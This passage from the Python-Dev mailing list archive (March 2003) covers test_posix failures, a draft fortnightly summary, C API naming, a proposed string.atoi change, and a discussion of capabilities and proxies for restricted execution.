> importing sys...? Is there a way? If there is not, than file.isatty() is
> moot.

Sorry, I don't understand the question.

> So, really, what is the meaning of "64" as the return from
> sys.stdout.isatty()?

Before Python 2.3, it's simply the value Microsoft's isatty() function
returned.  Python 2.3 translates it to a bool.  Microsoft's docs say:

    _isatty returns a nonzero value handle is associated with a character
    device. Otherwise, _isatty returns 0.

The grammar errors are copied verbatim from their docs, BTW -- telling me
that didn't make sense won't help you <wink>.


From mstone@ugcs.caltech.edu  Mon Mar 17 22:25:56 2003
From: mstone@ugcs.caltech.edu (mstone@ugcs.caltech.edu)
Date: Mon, 17 Mar 2003 14:25:56 -0800 (PST)
Subject: [Python-Dev] test_posix failures?
Message-ID: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>

> I think the test should be removed. I'm the one who added it, but
> there have been too many problems with it to make it useful.
> I will remove it later, unless someone beats me to it.
>
> Neal

In each case given the exception thrown is an OSError: [Errno 2] No
such file or directory, apparently due to inability to locate utmp.
The patch you already supplied at SF bug #697556 should fix any
of those.  Perhaps it's not necessary to scrap the test altogether?

(Now if anyone wants to look into the test_socket problem at 697556....)

-Michael


From thomas@xs4all.net  Mon Mar 17 22:42:33 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 23:42:33 +0100
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>
References: <Pine.LNX.4.53.0303171419010.23138@lira.ugcs.caltech.edu>
Message-ID: <20030317224233.GT2112@xs4all.nl>

On Mon, Mar 17, 2003 at 02:25:56PM -0800, mstone@ugcs.caltech.edu wrote:

> > I think the test should be removed. I'm the one who added it, but
> > there have been too many problems with it to make it useful.
> > I will remove it later, unless someone beats me to it.

> In each case given the exception thrown is an OSError: [Errno 2] No
> such file or directory, apparently due to inability to locate utmp.

No, the inability to locate the attached terminal in utmp (as I showed in my
example.) But this is not documented behaviour -- at least not on Linux,
BSDI and FreeBSD. I'm not able to reproduce the behaviour on the latter two,
but this may be because screen's "log-out" code isn't working properly. In
any case, we can't really rely on it only throwing OSError, but it's
probably 'good enough for our purposes'.

> (Now if anyone wants to look into the test_socket problem at 697556....)

A different bug report in the same bugreport  ? Not suprising no one looked
at it ;)
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From brett@python.org  Mon Mar 17 23:11:46 2003
From: brett@python.org (Brett Cannon)
Date: Mon, 17 Mar 2003 15:11:46 -0800 (PST)
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
Message-ID: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>

Guys have about 24 hours to point out how imperfect the summary is.

For those who participated in the `Capabilities` thread, please check my
summary.  I feel a little shaky about it and feel I could add more detail,
but I didn't want to add any wrong info so I kept it rather shallow.

------------------

python-dev Summary for 2003-03-01 through 2003-03-15
+++++++++++++++++++++++++++++++++++++++++++++++++++++

.. _last summary:

======================
Summary Announcements
======================

As I am sure most readers of this summary know by now, I am going to
PyCon_.  This means that I will be occupied the whole last week of this
month.  I suspect python-dev traffic will be light since I believe most of
PythonLabs will be at Pycon and thus not working.  =)  But still, I will
be occupied myself and thus won't have a chance to work on the summary
until I come home.  This means you should expect the next summary to be
rather late.  I will get to it, though, at some point.

And in case you haven't yet, register for PyCon_.

.. _PyCon: http://www.python.org/pycon/

=============================================
`Ridiculously minor tweaks?`__
=============================================
__ http://mail.python.org/pipermail/python-dev/2003-March/033962.html

Splinter threads:
    - `How long is your shopping tuple?
<http://mail.python.org/pipermail/python-dev/2003-March/033996.html>`__
    - `Tuples vs lists
<http://mail.python.org/pipermail/python-dev/2003-March/033981.html>`__
    - `Re: lists v. tuples
<http://mail.python.org/pipermail/python-dev/2003-March/034029.html>`__
    - `mutability
<http://mail.python.org/pipermail/python-dev/2003-March/034057.html>`__

The original point of this thread was Jeremy Fincher finding out if
patches changing lists to tuples where the list was not mutated would be
accepted for a miniscule performance boost (the answer was no).  But this
wasn't the interesting knowledge that came out of this thread.  This
thread led to Guido stating his intended uses of tuples and lists.

And you might be going, "lists are for mutable sequences of objects while
tuples are for immutable sequences of objects".  Well, that is not what
Guido thinks of lists and tuples (and don't feel bad if you thought
otherwise; Christian Tismer didn't even know what Guido had in mind and
Python does not exactly require you to agree with Guido on this).  Turns
out that tuples, in Guido's view of the world, are "for heterogeneous
data" and "list[s] are for homogeneous data"; "Tuples are *not* read-only
lists".

Guido spelled out his thinking on this in a later email.  He basically
said that he viewed lists as "a sequence of items of type X" while tuples
are more like "a sequence of length N with items of type X1, X2, X3, ..."
This makes sense since lists can be sorted while tuples can't; sorting on
different types don't necessarily result in a sequence sorted the way you
think about it.

And if you are still having issues of wrapping your head around this, just
view tuples as structs and lists as arrays as in C.

This thread then led to another topic of comparisons_ in Python.  Guido
ended up mentioning how he wished == and != worked on all types (with
disparate types always being !=) while all of the other comparisons only
worked on similar types for the interpreter's default comparison
abilities.

This then led to Guido saying how he wished the __cmp__() magic method and
the cmp() built-in didn't exist.  This is because there are currently two
ways to do comparisons; __cmp__(), and then all of the other rich
comparison magic methods.  You can implement the same functionality as
__cmp__() using just __lt__() and __eq__().  There can also be an unneeded
performance penalty for __cmp__() since (using the previously mentioned
way of re-implementing __cmp__()) you might have to do some unneeded
comparisons when all you need is __eq__().

This discussion is still going on.

.. _comparisons:
http://www.python.org/dev/doc/devel/ref/customization.html#l2h-91


===========================
`Capabilities in Python`__
===========================
__ http://mail.python.org/pipermail/python-dev/2003-March/033820.html

Splinter threads:
    - `Capabilities
<http://mail.python.org/pipermail/python-dev/2003-March/033854.html>`__
    - `about candy
<http://mail.python.org/pipermail/python-dev/2003-March/033986.html>`__

This is a continuation of a discussion covered in the `last summary`_.

This was *definitely* the thread from hell for this summary.  =)  It is
very long and there was confusion at multiple points over terminology.
You have been warned.

Three things were constantly being discussed in this thread; restricted
execution, capabilities, and proxies.  We discuss them in this order.

Restricted execution basically cuts out access to certain objects at
execution time.  Currently, if you replace the global __builtins__ with
something other then what __builtin__.__dict__ has then you enable
restricted execution in Python.  This cuts off access to built-in objects
so as to prevent you from circumventing security code by, for instance,
importing the sys_ module so you can replace a module's code in
sys.modules.  Both capabilities and proxies are worthless without
restricted execution since they could be circumvented without it.

Capabilities can loosely be thought of like bound methods.  Security with
capabilities is done based on possession; if you hold a reference to an
object you can use that object.

Proxies are a wrapper around objects that restrict access to the object.
This restriction extends all the way to the core; even core code can't get
access to parts of a proxied object that it doesn't want any object to get
a hold of.

There was talk of a PEP on all of this but one has not appeared yet.

.. _sys: http://www.python.org/dev/doc/devel/lib/module-sys.html


=========
Quickies
=========

`Codec registry
<http://mail.python.org/pipermail/python-dev/2003-March/033805.html>`__
    Gustavo Niemeyer asked someone to review a patch.

`Changes to logging in CVS
<http://mail.python.org/pipermail/python-dev/2003-March/033811.html>`__
    Vinay Sajip if someone checked-in changes to the logging_ package
could be rolled back since it broke compatibility with Python 1.5.2 which
the logging package tries to keep (as mentioned in `PEP 291`_).  The
changes were removed.

.. _logging: http://www.python.org/dev/doc/devel/lib/module-logging.html
.. _PEP 291: http://www.python.org/peps/pep-0291.html

`__slots__ for metatypes
<http://mail.python.org/pipermail/python-dev/2003-March/033815.html>`__
    Christian Tismer asked Guido and the list to take a look at a patch
that would allow meta-types to have a __slots__.  The patch was accepted
and applied.

`new bytecode results
<http://mail.python.org/pipermail/python-dev/2003-March/033817.html>`__
    Damien Morton continues on his quest to get performance boosts from
fiddling with the eval loop contained in `ceval.c`_ and trying out various
opcode ideas.  It was pointed out that pystone_ is a good indicator of how
Zope_ will perform on a new box.  It was also stated by Tim Peters that
since it is such an atypical test that it helps to make sure any
improvements you make *really* do make an improvement.  Damien also
requested more people contribute statistical information to Skip
Montanaro's stat server (more info at
http://manatee.mojam.com/~skip/python/ ).

.. ceval.c:
.. _pystone:
.. _Zope: http://www.zope.org/

`module extension search order - can it be changed?
<http://mail.python.org/pipermail/python-dev/2003-March/033826.html>`__
    This was discussed in the `last summary`_.  Tim Peters mentioned how
he doesn't use linecache_ often and that it's printing out of date info is
of any great use for tracebacks.

.. _linecache:
http://www.python.org/dev/doc/devel/lib/module-linecache.html

`JUMP_IF_X opcodes
<http://mail.python.org/pipermail/python-dev/2003-March/033823.html>`__
    Damien Morton, still on the prowl for better opcodes, suggested
introducing opcodes that combined branching opcodes and POP_TOP (which
pops the top of the interpreter stack)and did the pop based on the truth
value of what was being tested.  Neal Norwitz suggested that instead the
branching instructions just always pop the stack.
    If all of this cool opcode stuff that Damien keeps doing interests
you, you will want to read `opcode.h`_, `ceval.c`_, and learn how to use
the dis_ module.

.. _opcode.h:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Include/opcode.h
.. _ceval.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/ceval.c
.. _dis: http://www.python.org/dev/doc/devel/lib/module-dis.html

`Fun with timeit.py
<http://mail.python.org/pipermail/python-dev/2003-March/033826.html>`__
    A new module named timeit_ was added to the stdlib at the request of
Jim Fulton.  The module times the execution of code snippets.  Guido timed
the execution of going through a 'for' loop a million times with
interpreters from Python 1.3 up to the current CVS (2.3a2 with patches up
to that point).  The result was that CVS was the fastest.

.. _timeit:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/timeit.py

`Pre-PyCon sprint ideas
<http://mail.python.org/pipermail/python-dev/2003-March/033827.html>`__
    I asked the list to suggest ideas to sprint on at PyCon_.

`More Zen
<http://mail.python.org/pipermail/python-dev/2003-March/033828.html>`__
    Words of wisdom from Raymond Hettinger that everyone should read.  And
if you have never read Raymond's `School of Hard Knocks`_ email you owe
yourself to stop whatever you are doing and read it **now**.  I can
personally vouch that email is right on the money; I have experienced (or
suffered, depending on your view =) every single thing on that list sans
writing a PEP (although writing the Summary is starting to be enough
writing to be equal =) .

.. _School of Hard Knocks:
http://mail.python.org/pipermail/python-dev/2002-September/028725.html

`xmlrpclib
<http://mail.python.org/pipermail/python-dev/2003-March/033837.html>`__ :
`xmlrpclib: Apology
<http://mail.python.org/pipermail/python-dev/2003-March/033847.html>`__
    Bill Bumgarner, the "hillbilly from the midwest of the US", asked if
the xmlrpclib_ module was being maintained.  The lesson was also learned
to not call Fredrick Lundh "Fred" on the list since Fred L. Drake, Jr.
tends to be associated with the name.  =)

.. _xmlrpclib:
http://www.python.org/dev/doc/devel/lib/module-xmlrpclib.html

`httplib SSLFile broken in CVS
<http://mail.python.org/pipermail/python-dev/2003-March/033832.html>`__
    Something got broken and fixed.

`super() bug (?)
<http://mail.python.org/pipermail/python-dev/2003-March/033846.html>`__
    Samuele Pedroni thought he may have found a bug with super() but
turned out it wasn't.

`test_popen broken on Win2K
<http://mail.python.org/pipermail/python-dev/2003-March/033857.html>`__
    Win2k does not like quoting of commands when there is no space in the
command as Tim Peters discovered.  There were discussions on how to deal
with this.  The suggestion of coming up with an sh-like syntax that works
on all platforms (like what tcl's exec command has) was suggsted.

`Change in int() behavior
<http://mail.python.org/pipermail/python-dev/2003-March/033863.html>`__
    David Abrahams rediscovered the joys of the road to which leads to
int/long unification when he noticed that ``isinstance(int(sys.maxint*2),
int)`` returns False.  This will not be an issue once we are farther down
this road.

`acceptability of asm in python code?
<http://mail.python.org/pipermail/python-dev/2003-March/033868.html>`__
    Damien Morton popped his optimizing head back up on python-dev asking
if assembly code was acceptable in the core.  As of right now there is
none, but Tim Peters stated that if there was some that had "a huge
speedup, on all programs" then it would be considered, although "on the
weak end of maybe".  Christian Tismer (who plays with assembly in
Stackless_) warned against it in a large function since it can mess up
caching.

.. _Stackless: http://www.stackless.com/

`Internationalizing domain names
<http://mail.python.org/pipermail/python-dev/2003-March/033869.html>`__
    Martin v. Lwis asked someone to look over his patches to implement
IDNA (International Domain Names in Applications) which allows non-ASCII
characters in domain names.

`VERSION in getpath.c
<http://mail.python.org/pipermail/python-dev/2003-March/033882.html>`__
    Guido explains to someone what compile variables are used to generate
some compile-based search paths.

`Where is OSS used?
<http://mail.python.org/pipermail/python-dev/2003-March/033905.html>`__
    Greg Ward asked what OSs use OSS_.

.. _OSS: http://www.opensound.com/

`Audio devices
<http://mail.python.org/pipermail/python-dev/2003-March/033947.html>`__
    Greg Ward asked for opinions on some API issues for ossaudiodev_.

.. _ossaudiodev:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/ossaudiodev.c

`bsddb3 test errors - are these expected?
<http://mail.python.org/pipermail/python-dev/2003-March/033961.html>`__
    Skip Montanaro asked if some errors from the testing of bsddb3_ on OS
X were expected.

.. _bsddb3:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_bsddb.c

`os.path.dirname misleading?
<http://mail.python.org/pipermail/python-dev/2003-March/033980.html>`__
    Kevin Altis was surprised to discover that `os.path.dirname`_ would
return the tail end of a directory instead of an empty string when the
argument to the function was just a directory name.

.. _os.path.dirname:
http://www.python.org/dev/doc/devel/lib/module-os.path.html#l2h-1443

`Care to sprint on the core at PyCon?
<http://mail.python.org/pipermail/python-dev/2003-March/033999.html>`__
    Me asking the world if they wanted to sprint on the core at the
pre-PyCon sprint (if you do, read the email for details).

`Iterable sockets?
<http://mail.python.org/pipermail/python-dev/2003-March/034038.html>`__
    Andrew McNamara wished that socket objects were iterable on a per-line
basis without having to call makefile().  Guido said he would rather come
up with a better abstraction for Python 3 and prototype it in Python 2.4
or later.

`More int/long integration issues
<http://mail.python.org/pipermail/python-dev/2003-March/034019.html>`__
    David Abrahams noticed that range() and xrange() couldn't accept a
long.  It basically led to Guido stating he hates xrange() and wish it
didn't exist.  But since getting rid of it would break code he can at
least prevent it from gaining abilities.  It also led to Guido mentioning
again how he would like to prohibit shadowing of built-ins.

`tzset
<http://mail.python.org/pipermail/python-dev/2003-March/034062.html>`__
    A new function, time.tzset(), was added to Python and the tests had
failed under Windows.  The tests and the ./configure check were changed as
needed.

`PyObject_New vs PyObject_NEW
<http://mail.python.org/pipermail/python-dev/2003-March/033970.html>`__
    Lesson of the thread: PyObject_NEW is only to be used in the core; use
`PyObject_New()`_ for extension modules.

.. _PyObject_New():
http://www.python.org/dev/doc/devel/api/allocating-objects.html

`are NULL checks in Objects/abstract.c really needed?
<http://mail.python.org/pipermail/python-dev/2003-March/034011.html>`__
    ... They are not required, but they are there to protect you against
poorly written extensions.  Skip Montanaro subsequently suggested a
--without-null-checks compile option.

`PyEval_GetFrame() revisited
<http://mail.python.org/pipermail/python-dev/2003-March/034052.html>`__
    A possible API for manipulating the current frame was still being
discussed.


From ark@research.att.com  Mon Mar 17 23:34:02 2003
From: ark@research.att.com (Andrew Koenig)
Date: Mon, 17 Mar 2003 18:34:02 -0500 (EST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
 (message from Guido van Rossum on Sun, 16 Mar 2003 15:34:17 -0500)
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
 <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303172334.h2HNY2j13488@europa.research.att.com>

Guido> This seems an argument for keeping both __cmp__ and the six __lt__
Guido> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

I'm beginning to wonder if part of what's going on is that there are
really two different concepts that go under the general label of
"comparison", namely the cases where trichotomy does and does not apply.

In the first case, we have a total ordering; in the second, we have what
C++ calls a "strict weak ordering", which is really an ordering of
equivalence classes.


From greg@cosc.canterbury.ac.nz  Tue Mar 18 00:03:19 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 12:03:19 +1200 (NZST)
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <20030317151040.GQ2112@xs4all.nl>
Message-ID: <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>

Thomas Wouters <thomas@xs4all.net>:

> it's a generic way to return an iterator *for an
> iterator*. PyIter_GenericGetIter, PyObject_IterGetIter, etc are all
> more descriptive.

It should have Generic in it somewhere to fit the pattern.
I'd go for PyIter_GenericGetIter.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Tue Mar 18 01:34:01 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 20:34:01 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: "Your message of Tue, 18 Mar 2003 12:03:19 +1200."
 <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>
References: <200303180003.h2I03JJ25264@oma.cosc.canterbury.ac.nz>
Message-ID: <200303180134.h2I1Y1X19684@pcp02138704pcs.reston01.va.comcast.net>

> It should have Generic in it somewhere to fit the pattern.

Why?  It's *not* generic.  It's *specific* (to iterators).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Raymond Hettinger" <python@rcn.com  Tue Mar 18 01:36:04 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 20:36:04 -0500
Subject: [Python-Dev] Shortcut bugfix
Message-ID: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>

There is an SF report that Pmw gets TypeErrors under Py2.3
but not under previous versions of Python:  www.python.org/sf/697591

There are three parts to the story:
1.   a method in _tkinter.c was changed (probably appropriately) to 
      occassionally return ints in addition to strings.

2.   Pmw used string.atoi() to coerce the result to an int.
      This should probably be changed, but I don't want
      existing Pmw to suddenly fail under 2.3.

3.   String.atoi(s)  works by calling int(s,10).  It is the
      ten part that makes int() raise a TypeError.

The long way to fix this bug is to 1) have Neal or MvL research the 
propriety of the changes to _tkinter and possibly find that they needed to
be done and have to be left alone and 2) have the Pmw folks
update their code to not use string.atoi(s) when s is not a string
(seems like a bug, but s used to always be a string when they
wrote the code).  Step 2 doesn't help existing users of Pmw
unless they get a bugfix release.

The shortcut is to fix something that isn't broken and have string.atoi
stop automatically appending the ten to the int() call.

Current string.atoi:
    def atoi(s, base=10):
        return _int(s, base)

Proposed string.atoi:
    def atoi(s, *args):
        return _int(s, *args)

The shortcut has some appeal because it lets the improvements
to _tkinter stay in place and allows existing Pmw installations
to continue to operate.  Otherwise, one of the two has to change.

Does anyone think changin string.atoi is the wrong way to go?


Raymond Hettinger


From greg@cosc.canterbury.ac.nz  Tue Mar 18 01:41:18 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 13:41:18 +1200 (NZST)
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <200303180134.h2I1Y1X19684@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303180141.h2I1fIq27804@oma.cosc.canterbury.ac.nz>

> Why?  It's *not* generic.  It's *specific* (to iterators).

That's why I voted for PyIter_GenericGetIter and not
PyObject_GenericGetIter.

PyIter_ means it has to do with iterators; Generic means
it's a default implementation; GetIter identifies which
type slot it implements.

Hmmm... maybe we need a formal grammar for Python/C API
function names, to help settle questions like this...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue Mar 18 01:47:24 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 18 Mar 2003 13:47:24 +1200 (NZST)
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <200303180147.h2I1lOs27924@oma.cosc.canterbury.ac.nz>

Raymond Hettinger <raymond.hettinger@verizon.net>:

> Current string.atoi:
>     def atoi(s, base=10):
>         return _int(s, base)
> 
> Proposed string.atoi:
>     def atoi(s, *args):
>         return _int(s, *args)

It looks harmless to me. My only concern would be if it
started making things like string.atoi("0x10") accepted,
but a quick experiment suggests that this would not be
the case (in 2.2, at least).

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Tue Mar 18 06:58:03 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 18 Mar 2003 07:58:03 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <m3znntnouc.fsf@mira.informatik.hu-berlin.de>

"Raymond Hettinger" <raymond.hettinger@verizon.net> writes:

> There are three parts to the story:
> 1.   a method in _tkinter.c was changed (probably appropriately) to 
>       occassionally return ints in addition to strings.
> 
> 2.   Pmw used string.atoi() to coerce the result to an int.
>       This should probably be changed, but I don't want
>       existing Pmw to suddenly fail under 2.3.

Is Pmw using _tkinter directly, or indirectly via Tkinter?

Neither answer to this question makes sense:
a) if Pmw uses _tkinter directly, it should not receive int results.
b) if Pmw uses Tkinter, it should not find methods that used to
   return strings but now return ints.

If, for some strange reason, b) does happen, applications can invoke
Tkinter.wantobjects = 0
to restore the old behaviour.

> Does anyone think changin string.atoi is the wrong way to go?

It would change the historical behaviour, I believe:
string.atoi(10) used to give a TypeError even back in Python 1.5.

Regards,
Martin


From ben@algroup.co.uk  Tue Mar 18 09:43:36 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 09:43:36 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <3E76EA48.7070402@algroup.co.uk>

Brett Cannon wrote:
> There was talk of a PEP on all of this but one has not appeared yet.

I am working on it now.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mal@lemburg.com  Tue Mar 18 09:50:29 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 18 Mar 2003 10:50:29 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
Message-ID: <3E76EBE5.8020200@lemburg.com>

Raymond Hettinger wrote:
> The shortcut is to fix something that isn't broken and have string.atoi
> stop automatically appending the ten to the int() call.
> 
> Current string.atoi:
>     def atoi(s, base=10):
>         return _int(s, base)
> 
> Proposed string.atoi:
>     def atoi(s, *args):
>         return _int(s, *args)
> 
> The shortcut has some appeal because it lets the improvements
> to _tkinter stay in place and allows existing Pmw installations
> to continue to operate.  Otherwise, one of the two has to change.
> 
> Does anyone think changin string.atoi is the wrong way to go?

Yes, because it changes the semantics. string.atoi() would suddenly
start to accept non-strings like integers, floats, etc.

My suggestion would be to carefully reconsider the changes to
_tkinter. If it's true that a method can now return strings *and*
integers which previously only returned strings, then such a
change is clearly not backward compatible.  I'd create a new
method for the new semantics in that case.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 18 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     14 days left
EuroPython 2003, Charleroi, Belgium:                        98 days left


From ben@algroup.co.uk  Tue Mar 18 09:54:06 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 09:54:06 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <3E76ECBE.7050200@algroup.co.uk>

Brett Cannon wrote:
> Capabilities can loosely be thought of like bound methods.  Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

This confusion is my fault: I just happened to like using bound methods 
as the basis for capabilities, but objects can also be used, so long as 
access to them is appropriately restricted. This is explained in detail 
in the PEP I am writing (with help from others, I should note).

> Proxies are a wrapper around objects that restrict access to the object.
> This restriction extends all the way to the core; even core code can't get
> access to parts of a proxied object that it doesn't want any object to get
> a hold of.

Its not clear to me what you mean by "core code" - certainly anything 
written in C can slice through a proxy without any problems (or, indeed, 
a capability).

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mal@lemburg.com  Tue Mar 18 10:27:14 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 18 Mar 2003 11:27:14 +0100
Subject: [Python-Dev] capabilities & proxies (python-dev Summary for 2003-03-01
 through 2003-03-15)
In-Reply-To: <3E76ECBE.7050200@algroup.co.uk>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <3E76ECBE.7050200@algroup.co.uk>
Message-ID: <3E76F482.7030508@lemburg.com>

Ben Laurie wrote:
> Brett Cannon wrote:
> 
>> Capabilities can loosely be thought of like bound methods.  Security with
>> capabilities is done based on possession; if you hold a reference to an
>> object you can use that object.
> 
> 
> This confusion is my fault: I just happened to like using bound methods 
> as the basis for capabilities, but objects can also be used, so long as 
> access to them is appropriately restricted. This is explained in detail 
> in the PEP I am writing (with help from others, I should note).
> 
>> Proxies are a wrapper around objects that restrict access to the object.
>> This restriction extends all the way to the core; even core code can't 
>> get
>> access to parts of a proxied object that it doesn't want any object to 
>> get
>> a hold of.
> 
> Its not clear to me what you mean by "core code" - certainly anything 
> written in C can slice through a proxy without any problems (or, indeed, 
> a capability).

That's certainly true...

BTW, just in case you aren't aware of it, mxProxy implements pretty
much what Brett summarized here for proxies. You may want to have
a look.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 18 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     14 days left
EuroPython 2003, Charleroi, Belgium:                        98 days left


From zooko@zooko.com  Tue Mar 18 11:40:41 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 06:40:41 -0500
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: Message from Brett Cannon <bac@OCF.Berkeley.EDU>
 of "Mon, 17 Mar 2003 15:11:46 PST." <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
Message-ID: <E18vFST-0000U4-00@localhost>

> Capabilities can loosely be thought of like bound methods.  Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

No -- capabilities (as envisioned for Python) are references.  Whether a 
reference to an object, to a bound method, or to a function doesn't matter.

Note that it isn't that capabilities are "like" references, it is that 
capabilities *are* references.  Every reference is a capability.  Every 
capability is a reference.

> Security with
> capabilities is done based on possession; if you hold a reference to an
> object you can use that object.

Yes.

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Tue Mar 18 12:15:09 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 07:15:09 -0500
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: "Your message of Tue, 18 Mar 2003 10:50:29 +0100."
 <3E76EBE5.8020200@lemburg.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
Message-ID: <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>

> > Does anyone think changin string.atoi is the wrong way to go?
> 
> Yes, because it changes the semantics. string.atoi() would suddenly
> start to accept non-strings like integers, floats, etc.
> 
> My suggestion would be to carefully reconsider the changes to
> _tkinter. If it's true that a method can now return strings *and*
> integers which previously only returned strings, then such a
> change is clearly not backward compatible.  I'd create a new
> method for the new semantics in that case.

That's my gut feeling too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ben@algroup.co.uk  Tue Mar 18 12:11:09 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 18 Mar 2003 12:11:09 +0000
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <E18vFST-0000U4-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>
Message-ID: <3E770CDD.7050206@algroup.co.uk>

Zooko wrote:
